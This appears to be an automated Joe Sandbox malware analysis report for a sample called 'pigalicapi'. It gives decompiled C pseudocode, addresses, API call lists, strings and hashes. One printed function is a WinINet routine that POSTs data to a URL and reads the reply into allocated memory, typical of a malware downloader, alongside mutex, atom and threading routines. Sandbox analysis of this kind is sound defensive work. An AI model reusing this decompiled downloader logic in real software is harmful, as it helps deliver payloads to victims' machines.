								_t421 = E024E1E60( &_v324);
								_t598 = _t598 + 4;
								_v616 = _t421;
								__eflags = _v616;
								if(_v616 == 0) {
									E024E6CF0();
									goto L37;
								}
								E024E74A0();
								ExitProcess(0);
							}
							_v60 =  *_v20;
							_v20 = _v20 + _v60;
							__eflags = _v20 - _a4 + _a8;
							if(_v20 <= _a4 + _a8) {
								goto L29;
							}
							return 0;
						}
						__eflags = (_v13 & 0x000000ff) - 1;
						if((_v13 & 0x000000ff) != 1) {
							 *0x24f30e4 = 1;
						} else {
							 *0x24f30e4 = 2;
						}
					}
					goto L99;
				}
			}

0x024e62b9
0x024e62c4
0x024e6c4e
0x00000000
0x024e62d4
0x024e62d9
0x024e62e0
0x024e62f9
0x024e62fc
0x024e630e
0x024e631e
0x024e6343
0x024e6349
0x024e6354
0x024e635d
0x024e6363
0x024e6429
0x024e6308
0x024e6308
0x024e630b
0x00000000
0x024e630b
0x024e636f
0x024e6375
0x00000000
0x00000000
0x024e637b
0x024e6381
0x024e6384
0x00000000
0x00000000
0x024e6391
0x024e6393
0x00000000
0x00000000
0x024e6399
0x024e639f
0x024e63a2
0x024e6419
0x024e641e
0x024e6424
0x024e6427
0x00000000
0x024e6427
0x024e63ad
0x024e63c3
0x024e63c6
0x024e63ca
0x024e640e
0x00000000
0x024e640e
0x024e63dc
0x024e63e1
0x024e63e4
0x024e63ef
0x024e63f4
0x024e63fa
0x024e63fa
0x024e6408
0x00000000
0x024e6320
0x024e6325
0x024e632e
0x024e633a
0x00000000
0x024e633c
0x00000000
0x024e633c
0x024e633a
0x024e631e
0x024e642e
0x024e6438
0x024e643b
0x024e644d
0x024e6450
0x024e6453
0x00000000
0x00000000
0x024e6459
0x024e645d
0x024e6482
0x024e6488
0x024e6493
0x024e649c
0x024e64a2
0x024e65f3
0x024e65f3
0x024e65f9
0x024e65fc
0x024e6609
0x024e660f
0x024e6bdd
0x024e6be3
0x024e6be9
0x024e6c18
0x024e6c1e
0x024e6c24
0x024e6c26
0x024e6c26
0x024e6c2a
0x024e6444
0x024e6447
0x024e6447
0x024e644a
0x00000000
0x024e644a
0x024e6bf1
0x024e6bf7
0x00000000
0x00000000
0x024e6c01
0x024e6c07
0x024e6c0e
0x024e6c13
0x00000000
0x024e6c13
0x024e661b
0x024e6621
0x00000000
0x00000000
0x024e6633
0x024e6638
0x024e663e
0x024e6640
0x024e6647
0x024e664a
0x024e664e
0x024e6752
0x024e6752
0x024e6758
0x024e675b
0x024e69cb
0x024e69dc
0x024e69ed
0x024e69f2
0x024e6a1a
0x024e6a3c
0x024e6a42
0x024e6a49
0x024e6bd6
0x00000000
0x024e6bd6
0x024e6a4f
0x024e6a59
0x024e6a66
0x024e6a6c
0x024e6a72
0x024e6a75
0x024e6b3c
0x024e6a7b
0x024e6a84
0x024e6aa0
0x024e6aa6
0x024e6aad
0x024e6ac5
0x024e6aca
0x024e6ad0
0x024e6af6
0x024e6b02
0x024e6b02
0x024e6b16
0x024e6b16
0x024e6b1c
0x024e6b42
0x024e6b49
0x024e6bc9
0x024e6bd0
0x024e6b4b
0x024e6b51
0x024e6b57
0x00000000
0x00000000
0x024e6b60
0x024e6b6d
0x024e6b72
0x024e6b75
0x024e6b7b
0x024e6b82
0x024e6b84
0x024e6b87
0x024e6b8b
0x024e6b99
0x024e6b9e
0x024e6b9e
0x024e6ba1
0x024e6ba7
0x024e6baa
0x024e6bb8
0x024e6bbd
0x024e6bbd
0x024e6bc0
0x024e6bc0
0x024e6bc7
0x00000000
0x024e6b49
0x024e6761
0x024e676b
0x024e6775
0x024e677f
0x024e6785
0x024e6788
0x024e685c
0x024e6861
0x024e6864
0x024e678e
0x024e6797
0x024e67ad
0x024e67b3
0x024e67b9
0x024e67c0
0x024e67dc
0x024e67e1
0x024e67e7
0x024e67f0
0x024e67f5
0x024e67f8
0x024e67fe
0x024e6804
0x024e6807
0x024e6819
0x024e681f
0x024e683a
0x024e683f
0x024e683f
0x024e6807
0x024e6850
0x024e6850
0x024e6856
0x024e686a
0x024e6871
0x024e6877
0x024e687a
0x024e687e
0x024e688c
0x024e6891
0x024e6891
0x024e6894
0x024e689a
0x024e689d
0x024e68a5
0x024e68aa
0x024e68ad
0x024e68b9
0x024e68bf
0x024e68c5
0x024e68c8
0x024e6902
0x024e690a
0x024e690d
0x024e6920
0x024e6925
0x024e6931
0x024e6931
0x024e68ca
0x024e68d6
0x024e68e4
0x024e68e4
0x024e693a
0x024e693d
0x024e694b
0x024e695a
0x024e6971
0x024e6977
0x024e6984
0x024e6984
0x024e693d
0x024e698a
0x024e6990
0x024e6993
0x024e69a1
0x024e69a6
0x024e69a6
0x024e69a9
0x024e69a9
0x00000000
0x024e69b0
0x024e6667
0x024e666d
0x024e6674
0x00000000
0x00000000
0x024e6689
0x024e6693
0x024e6698
0x024e669b
0x024e66a7
0x024e66b8
0x024e66c6
0x024e66d5
0x024e66e4
0x024e66f0
0x024e66ff
0x024e670e
0x024e671d
0x024e673a
0x024e6747
0x00000000
0x024e6747
0x00000000
0x024e6642
0x00000000
0x024e65fe
0x024e64ae
0x024e64b4
0x00000000
0x00000000
0x024e64cb
0x024e64dc
0x024e64ed
0x024e64f2
0x024e651a
0x024e653f
0x024e6545
0x024e654c
0x00000000
0x00000000
0x024e6552
0x024e655c
0x024e657e
0x024e6584
0x024e6586
0x024e65dd
0x024e65dd
0x024e65e4
0x024e65ed
0x024e65ed
0x00000000
0x024e65e4
0x024e658e
0x024e6591
0x00000000
0x00000000
0x024e65a0
0x024e65a6
0x024e65b2
0x024e65b7
0x024e65ba
0x024e65c0
0x024e65c7
0x024e65d8
0x00000000
0x024e65d8
0x024e65c9
0x024e65d0
0x024e65d0
0x024e6464
0x024e646d
0x024e6476
0x024e6479
0x00000000
0x00000000
0x00000000
0x024e647b
0x024e6c33
0x024e6c36
0x024e6c44
0x024e6c38
0x024e6c38
0x024e6c38
0x024e6c36
0x00000000
0x024e62e0

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 024E63BD
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00000000,?), ref: 024E6408

Strings

TEMP, xrefs: 024E64C6
TEMP, xrefs: 024E69C6
Hogerfazwafx, xrefs: 024E6C06

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: Virtual$AllocFree
String ID: Hogerfazwafx$TEMP$TEMP
API String ID: 2087232378-1474595832
Opcode ID: f0f4769692833eff7837c28002840f625a22f91e29d8fb636c240e437392ceeb
Instruction ID: 7fd1b231bffb25293bd9023c081c4e6f407c75b4684cf46447ed194f1b0ee3fa
Opcode Fuzzy Hash: f0f4769692833eff7837c28002840f625a22f91e29d8fb636c240e437392ceeb
Instruction Fuzzy Hash: 8D522DB4E00218DFEF54DF94DC84BAEB7B5BB48305F14859AE50AAB381D770AA81CF54

Uniqueness

Uniqueness Score: -1.00%

Function 024E1840 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 260
networkfilememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E024E1840(char* _a4, void* _a8, long _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr* _a24, intOrPtr _a28, intOrPtr* _a32) {
				long _v8;
				char _v276;
				char _v1300;
				char _v1564;
				void* _v1568;
				void* _v1572;
				char* _v1576;
				intOrPtr _v1588;
				char* _v1592;
				signed short _v1612;
				intOrPtr _v1616;
				char* _v1620;
				void* _v1636;
				void* _v1640;
				void* _v1644;
				void* _v1648;
				long _v1652;
				void _v1656;
				void _v1916;
				long _v1920;
				long _v1924;
				long _v1928;
				void* _v1932;
				intOrPtr _v1936;
				long _v1940;
				long _v1944;
				long _v1948;
				void _v2972;
				long _v2976;
				int _t116;
				void* _t117;
				void* _t119;
				void* _t123;
				int _t133;
				void* _t143;
				long _t151;
				void* _t194;
				void* _t195;
				void* _t196;

				_v8 = 0;
				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
					L37:
					return _v8;
				} else {
					_v1644 = 0;
					_v1640 = 0;
					_v1568 = 0;
					_v1576 = "*/*";
					_v1572 = 0;
					E024E7D20( &_v1636,  &_v1636, 0, 0x3c);
					_t195 = _t194 + 0xc;
					_v1636 = 0x3c;
					_v1620 =  &_v1564;
					_v1616 = 0x104;
					_v1592 =  &_v276;
					_v1588 = 0x104;
					_t116 = InternetCrackUrlA(_a4, 0, 0,  &_v1636); // executed
					if(_t116 == 0) {
						goto L37;
					}
					_t117 = InternetOpenA("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)", 1, 0, 0, 0); // executed
					_v1644 = _t117;
					if(_v1644 == 0) {
						goto L37;
					}
					_t119 = InternetConnectA(_v1644, _v1620, _v1612 & 0x0000ffff, 0, 0, 3, 0, 0); // executed
					_v1640 = _t119;
					if(_v1640 == 0) {
						L36:
						InternetCloseHandle(_v1644);
						goto L37;
					}
					_t123 = HttpOpenRequestA(_v1640, "POST", _v1592, 0, 0,  &_v1576, 0x200300, 0); // executed
					_v1568 = _t123;
					if(_v1568 == 0) {
						L35:
						InternetCloseHandle(_v1640);
						goto L36;
					}
					wnsprintfA( &_v1300, 0x400, "Accept-Language: en-us\r\nContent-Type: application/octet-stream\r\nContent-Length: %d\r\n", _a12);
					_t196 = _t195 + 0x10;
					if(HttpAddRequestHeadersA(_v1568,  &_v1300, 0xffffffff, 0) == 0) {
						L34:
						InternetCloseHandle(_v1568); // executed
						goto L35;
					}
					_v1656 = 0x7530;
					if(_a28 > 0) {
						_v1656 = _a28;
					}
					InternetSetOptionA(_v1568, 6,  &_v1656, 4);
					_v1652 = 1;
					_v1648 = 0;
					do {
						_v1920 = 0x100;
						E024E7D20( &_v1916,  &_v1916, 0, 0x100);
						_t196 = _t196 + 0xc;
						_v1924 = 0;
						_t133 = HttpSendRequestA(_v1568, 0, 0, _a8, _a12); // executed
						if(_t133 == 0) {
							goto L32;
						}
						if(HttpQueryInfoA(_v1568, 0x13,  &_v1916,  &_v1920,  &_v1924) != 0) {
							_t137 = E024E7DD0( &_v1916);
							_t196 = _t196 + 4;
							_v1936 = _t137;
							if(_a32 != 0) {
								_t137 = _a32;
								 *_a32 = _v1936;
							}
						}
						E024E7D20(_t137,  &_v1916, 0, 0x100);
						_t196 = _t196 + 0xc;
						_v1928 = 0x500000;
						if(HttpQueryInfoA(_v1568, 5,  &_v1916,  &_v1920,  &_v1924) != 0) {
							_t151 = E024E7DD0( &_v1916);
							_t196 = _t196 + 4;
							_v1940 = _t151;
							if(_v1940 > 0 && _v1940 < 0x40000000) {
								_v1928 = _v1940;
							}
						}
						_t143 = VirtualAlloc(0, _v1928, 0x3000, 4); // executed
						_v1932 = _t143;
						if(_v1932 == 0) {
							_v2976 = 0;
							do {
								InternetReadFile(_v1568,  &_v2972, 0x400,  &_v2976);
							} while (_v2976 > 0);
						} else {
							 *_a16 = _v1932;
							 *_a20 = _v1928;
							_v8 = 1;
							_v1944 = _v1928;
							while(1) {
								_v1948 = 0;
								InternetReadFile(_v1568, _v1932, _v1944,  &_v1948); // executed
								if(_a24 != 0) {
									 *_a24 =  *_a24 + _v1948;
								}
								if(_v1948 == 0) {
									break;
								}
								_v1932 = _v1932 + _v1948;
								_v1944 = _v1944 - _v1948;
								if(_v1944 > 0) {
									continue;
								}
								L29:
								goto L32;
							}
							goto L29;
						}
						L32:
						_v1648 = _v1648 + 1;
					} while (_v8 == 0 && _v1648 < 1);
					goto L34;
				}
			}

0x024e1849
0x024e1854
0x024e1c95
0x024e1c9b
0x024e1878
0x024e1878
0x024e1882
0x024e188c
0x024e1896
0x024e18a0
0x024e18b5
0x024e18ba
0x024e18bd
0x024e18cd
0x024e18d3
0x024e18e3
0x024e18e9
0x024e1902
0x024e190a
0x00000000
0x00000000
0x024e191d
0x024e1923
0x024e1930
0x00000000
0x00000000
0x024e1956
0x024e195c
0x024e1969
0x024e1c88
0x024e1c8f
0x00000000
0x024e1c8f
0x024e1994
0x024e199a
0x024e19a7
0x024e1c7b
0x024e1c82
0x00000000
0x024e1c82
0x024e19c2
0x024e19c8
0x024e19e5
0x024e1c6e
0x024e1c75
0x00000000
0x024e1c75
0x024e19eb
0x024e19f9
0x024e19fe
0x024e19fe
0x024e1a16
0x024e1a1c
0x024e1a26
0x024e1a30
0x024e1a30
0x024e1a48
0x024e1a4d
0x024e1a50
0x024e1a6d
0x024e1a75
0x00000000
0x00000000
0x024e1aa1
0x024e1aaa
0x024e1aaf
0x024e1ab2
0x024e1abc
0x024e1abe
0x024e1ac7
0x024e1ac7
0x024e1abc
0x024e1ad7
0x024e1adc
0x024e1adf
0x024e1b0f
0x024e1b18
0x024e1b1d
0x024e1b20
0x024e1b2d
0x024e1b41
0x024e1b41
0x024e1b2d
0x024e1b57
0x024e1b5d
0x024e1b6a
0x024e1c19
0x024e1c23
0x024e1c3d
0x024e1c43
0x024e1b70
0x024e1b79
0x024e1b84
0x024e1b86
0x024e1b93
0x024e1b99
0x024e1b99
0x024e1bbf
0x024e1bc9
0x024e1bd9
0x024e1bd9
0x024e1be2
0x00000000
0x00000000
0x024e1bf2
0x024e1c04
0x024e1c11
0x00000000
0x024e1c15
0x024e1c17
0x00000000
0x024e1c17
0x00000000
0x024e1be4
0x024e1c4c
0x024e1c55
0x024e1c5b
0x00000000
0x024e1a30

APIs

InternetCrackUrlA.WININET(00000000,00000000,00000000,0000003C), ref: 024E1902
InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1),00000001,00000000,00000000,00000000), ref: 024E191D
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 024E1956
HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,024EC2C8,00200300,00000000), ref: 024E1994
wnsprintfA.SHLWAPI ref: 024E19C2
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,00000000), ref: 024E19DD
InternetSetOptionA.WININET(00000000,00000006,00007530,00000004), ref: 024E1A16
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 024E1A6D
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 024E1A99
HttpQueryInfoA.WININET(00000000,00000005,?,00000100,00000000), ref: 024E1B07
VirtualAlloc.KERNEL32(00000000,00500000,00003000,00000004), ref: 024E1B57
InternetReadFile.WININET(00000000,00000000,?,00000000), ref: 024E1BBF
InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 024E1C3D
InternetCloseHandle.WININET(00000000), ref: 024E1C75
InternetCloseHandle.WININET(00000000), ref: 024E1C82
InternetCloseHandle.WININET(00000000), ref: 024E1C8F

Strings

<, xrefs: 024E18BD
Accept-Language: en-usContent-Type: application/octet-streamContent-Length: %d, xrefs: 024E19B1
POST, xrefs: 024E1988
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1), xrefs: 024E1918
0u, xrefs: 024E19EB

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: Internet$Http$CloseHandleRequest$FileInfoOpenQueryRead$AllocConnectCrackHeadersOptionSendVirtualwnsprintf
String ID: 0u$<$Accept-Language: en-usContent-Type: application/octet-streamContent-Length: %d$Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)$POST
API String ID: 880997049-2804282621
Opcode ID: cd1c800169a05797ca0cc9c039310551fa1adbdefeefec0031a479c3dc5cc6cc
Instruction ID: 913e27883fbe3142f4188c9579e2fc372b868491048d8a463b96e962c2211e70
Opcode Fuzzy Hash: cd1c800169a05797ca0cc9c039310551fa1adbdefeefec0031a479c3dc5cc6cc
Instruction Fuzzy Hash: 08C10BB1D842189FEF24CF50CC89BEAB7B5EB44705F0045DAE50EA6280DB766E94CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00414330 Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 125
synchronizationstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strlen.NTDLL ref: 0041433F
memcpy.NTDLL ref: 0041438D
CreateMutexA.KERNEL32 ref: 004143F5
WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0040F2D5), ref: 00414410
FindAtomA.KERNEL32 ref: 00414421
malloc.MSVCRT ref: 00414439
AddAtomA.KERNEL32 ref: 00414463
free.MSVCRT ref: 0041448D
ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00414495
CloseHandle.KERNEL32 ref: 004144A1

Part of subcall function 004142C0: GetAtomNameA.KERNEL32(?,?,00000000), ref: 004142E3

memset.NTDLL ref: 004144E0

Strings

aaaa, xrefs: 004143C0
aaaa, xrefs: 004143CE
aaaa, xrefs: 004143C7
aaaa, xrefs: 004143A4
aaaa, xrefs: 004143AB
aaaa, xrefs: 004143B2
aaaa, xrefs: 004143B9

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: Atom$Mutex$CloseCreateFindHandleNameObjectReleaseSingleWaitfreemallocmemcpymemsetstrlen
String ID: aaaa$aaaa$aaaa$aaaa$aaaa$aaaa$aaaa
API String ID: 144078300-3683700703
Opcode ID: 38b3cc8253dde639ec07bf90a86a76e51e9cf28e81e2267e67a4dab4306abd3d
Instruction ID: 6bf16c6f7dc82afa38dfb2dcebf575d49d4c190a343fd4b51b9df02f2ee255c1
Opcode Fuzzy Hash: 38b3cc8253dde639ec07bf90a86a76e51e9cf28e81e2267e67a4dab4306abd3d
Instruction Fuzzy Hash: 635129B89083458BC710EF69D4863AEBBF0BF84301F01896EE8959B385D778D585CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0040EC50 Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 123
synchronizationstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strlen.NTDLL ref: 0040EC5F
memcpy.NTDLL ref: 0040ECAD
CreateMutexA.KERNEL32 ref: 0040ED0E
WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0040E26C), ref: 0040ED2A
FindAtomA.KERNEL32 ref: 0040ED3B
malloc.MSVCRT ref: 0040ED53
AddAtomA.KERNEL32 ref: 0040ED78
free.MSVCRT ref: 0040EDA2
ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040EDAD
FindCloseChangeNotification.KERNEL32 ref: 0040EDB9

Strings

aaaa, xrefs: 0040ECDC
aaaa, xrefs: 0040ECE3
aaaa, xrefs: 0040ECEA
aaaa, xrefs: 0040ECCE
aaaa, xrefs: 0040ECD5
aaaa, xrefs: 0040ECC7
aaaa, xrefs: 0040ECC0

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: AtomFindMutex$ChangeCloseCreateNotificationObjectReleaseSingleWaitfreemallocmemcpystrlen
String ID: aaaa$aaaa$aaaa$aaaa$aaaa$aaaa$aaaa
API String ID: 3507070773-3683700703
Opcode ID: d61ac55fb7e6056a8369cbc7b453f13adbe996a2e49b94902fd9d61e9f0cc443
Instruction ID: 8522d72e3f7aa3cec7441999860715555553f08e688ef583daf8eacf07a88261
Opcode Fuzzy Hash: d61ac55fb7e6056a8369cbc7b453f13adbe996a2e49b94902fd9d61e9f0cc443
Instruction Fuzzy Hash: 91517BB85083428FC710AF2AC48A26EBBF0FF84301F01896EE8859B391D778D555CB96

Uniqueness

Uniqueness Score: -1.00%

Function 024E4020 Relevance: 30.2, APIs: 20, Instructions: 215
threadsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E024E4020(intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, char _a24) {
				signed int _v5;
				signed int _v12;
				char _v16;
				void* _v20;
				struct _CRITICAL_SECTION _v44;
				long _v48;
				void* _v52;
				void _v56;
				long _v60;
				HANDLE* _v64;
				void* _v68;
				intOrPtr _v72;
				void* _v76;
				intOrPtr _v80;
				signed int _v84;
				void _v92;
				long _v96;
				signed int _v100;
				HANDLE* _v104;
				HANDLE* _v108;
				void* _t114;
				void* _t141;
				void* _t188;
				void* _t189;
				void* _t191;

				_v5 = 0;
				if(_a4 != 0 && _a8 > 0 && _a12 != 0 && _a16 > 0) {
					E024E7D20( &_v56,  &_v56, 0, 0x29);
					_t189 = _t188 + 0xc;
					InitializeCriticalSection( &_v44);
					_v16 = _a24;
					_v20 = CreateEventA(0, 1, 0, 0);
					asm("cdq");
					_v12 = _a8 / _a20;
					_v60 = 0;
					while(_v60 < _a16) {
						EnterCriticalSection( &_v44);
						if(_v52 != 0) {
							VirtualFree(_v52, 0, 0x8000);
							_v52 = 0;
							_v48 = 0;
						}
						_t198 = _v56;
						if(_v56 != 0) {
							TerminateThread(_v56, 0);
							_v56 = 0;
						}
						ResetEvent(_v20);
						LeaveCriticalSection( &_v44);
						_t114 = CreateThread(0, 0, E024E4AC0,  &_v56, 0, 0); // executed
						_v56 = _t114;
						_v104 = E024E97A0( ~(0 | _t198 > 0x00000000) | _a20 * 0x00000004);
						_v64 = _v104;
						E024E7D20(_v104, _v64, 0, _a20 << 2);
						_t191 = _t189 + 0x10;
						_v100 = 0;
						while(_v100 < _a20) {
							_v64[_v100] = 0;
							E024E7D20(_v64,  &_v92, 0, 0x1c);
							_t191 = _t191 + 0xc;
							_v68 =  &_v56;
							_v72 = _a12;
							_v92 = _a4;
							_v84 = _v100 * _v12;
							if(_v100 >= _a20 - 1) {
								_v80 = _a8 - 1;
							} else {
								_v80 = _v84 + _v12 - 1;
							}
							_v76 = CreateEventA(0, 1, 0, 0);
							_t141 = CreateThread(0, 0, E024E4BA0,  &_v92, 0, 0); // executed
							_v64[_v100] = _t141;
							WaitForSingleObject(_v76, 0xffffffff);
							FindCloseChangeNotification(_v76); // executed
							_v100 = _v100 + 1;
						}
						WaitForMultipleObjects(_a20, _v64, 1, 0xffffffff);
						_v96 = WaitForSingleObject(_v20, 0x2710);
						if(_v96 == 0) {
							_v5 = 1;
						}
						_v96 = WaitForSingleObject(_v56, 0x3e8);
						if(_v96 != 0) {
							TerminateThread(_v56, 0);
						}
						EnterCriticalSection( &_v44);
						if(_v52 != 0) {
							VirtualFree(_v52, 0, 0x8000); // executed
							_v52 = 0;
							_v48 = 0;
						}
						LeaveCriticalSection( &_v44);
						_v108 = _v64;
						E024E97C0(_v108);
						_t189 = _t191 + 4;
						if((_v5 & 0x000000ff) == 0) {
							_v60 = _v60 + 1;
							continue;
						} else {
						}
						break;
					}
					DeleteCriticalSection( &_v44);
				}
				return _v5;
			}

0x024e4026
0x024e402e
0x024e405a
0x024e405f
0x024e4066
0x024e406f
0x024e4080
0x024e4086
0x024e408a
0x024e408d
0x024e409f
0x024e40af
0x024e40b9
0x024e40c6
0x024e40cc
0x024e40d3
0x024e40d3
0x024e40da
0x024e40de
0x024e40e6
0x024e40ec
0x024e40ec
0x024e40f7
0x024e4101
0x024e4118
0x024e411e
0x024e413d
0x024e4143
0x024e4153
0x024e4158
0x024e415b
0x024e416d
0x024e417f
0x024e418e
0x024e4193
0x024e4199
0x024e419f
0x024e41a5
0x024e41af
0x024e41bb
0x024e41d2
0x024e41bd
0x024e41c7
0x024e41c7
0x024e41e3
0x024e41f7
0x024e4203
0x024e420c
0x024e4216
0x024e416a
0x024e416a
0x024e422d
0x024e4242
0x024e4249
0x024e424b
0x024e424b
0x024e425e
0x024e4265
0x024e426d
0x024e426d
0x024e4277
0x024e4281
0x024e428e
0x024e4294
0x024e429b
0x024e429b
0x024e42a6
0x024e42af
0x024e42b6
0x024e42bb
0x024e42c4
0x024e409c
0x00000000
0x00000000
0x024e42c6
0x00000000
0x024e42c4
0x024e42d1
0x024e42d1
0x024e42dd

APIs

InitializeCriticalSection.KERNEL32(?), ref: 024E4066
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 024E407A
EnterCriticalSection.KERNEL32(?,?), ref: 024E40AF
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 024E40C6
TerminateThread.KERNEL32(00000000,00000000), ref: 024E40E6
ResetEvent.KERNEL32(00000000), ref: 024E40F7
LeaveCriticalSection.KERNEL32(?), ref: 024E4101
CreateThread.KERNEL32 ref: 024E4118
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 024E41DD
CreateThread.KERNEL32 ref: 024E41F7
WaitForSingleObject.KERNEL32(?,000000FF), ref: 024E420C
FindCloseChangeNotification.KERNEL32(?), ref: 024E4216
WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 024E422D
WaitForSingleObject.KERNEL32(00000000,00002710), ref: 024E423C
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 024E4258
TerminateThread.KERNEL32(00000000,00000000), ref: 024E426D
EnterCriticalSection.KERNEL32(?), ref: 024E4277
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 024E428E
LeaveCriticalSection.KERNEL32(?), ref: 024E42A6
DeleteCriticalSection.KERNEL32(?,?), ref: 024E42D1

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: CriticalSection$CreateThreadWait$EventObjectSingle$EnterFreeLeaveTerminateVirtual$ChangeCloseDeleteFindInitializeMultipleNotificationObjectsReset
String ID:
API String ID: 1593741596-0
Opcode ID: 373b8e4e99a87a8d827194ac4d40e33f7370331306f5c0126c3acbb6926a3c99
Instruction ID: 907ea9e22f3bc7de270d94c0b3c6814717ed82fb3aa5fa76b84ea709fc40a9ac
Opcode Fuzzy Hash: 373b8e4e99a87a8d827194ac4d40e33f7370331306f5c0126c3acbb6926a3c99
Instruction Fuzzy Hash: 549105B4D40208EFEF18DFA4D889BAEBBB5BB48705F10451AFA06AA280D7749954CF50

Uniqueness

Uniqueness Score: -1.00%

Function 024E5700 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 148
filememorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E024E5700(CHAR* _a4) {
				char _v5;
				char _v24;
				long _v28;
				void* _v32;
				char _v556;
				long _v560;
				void* _v564;
				long _v568;
				intOrPtr _t59;
				void* _t67;
				void* _t71;

				_v5 = 0;
				if(_a4 != 0) {
					E024E8F80(_a4, 0x100, _a4 + 0x437); // executed
					GetModuleFileNameA(0, _a4 + 0x100, 0x104);
